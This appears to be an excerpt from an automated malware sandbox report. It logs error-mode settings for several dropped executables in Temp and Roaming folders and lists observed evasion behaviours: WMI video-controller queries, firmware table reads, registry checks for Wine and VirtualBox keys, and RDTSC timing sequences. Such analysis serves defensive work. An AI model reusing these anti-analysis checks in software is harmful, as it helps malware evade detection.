Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C8E9 second address: A0C8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C8EF second address: A0C90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838D0CF54h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C90D second address: A0C911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C911 second address: A0C917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C917 second address: A0C93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a je 00007F3838E06D16h 0x00000010 jmp 00007F3838E06D1Eh 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C93A second address: A0C940 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0C940 second address: A0C945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
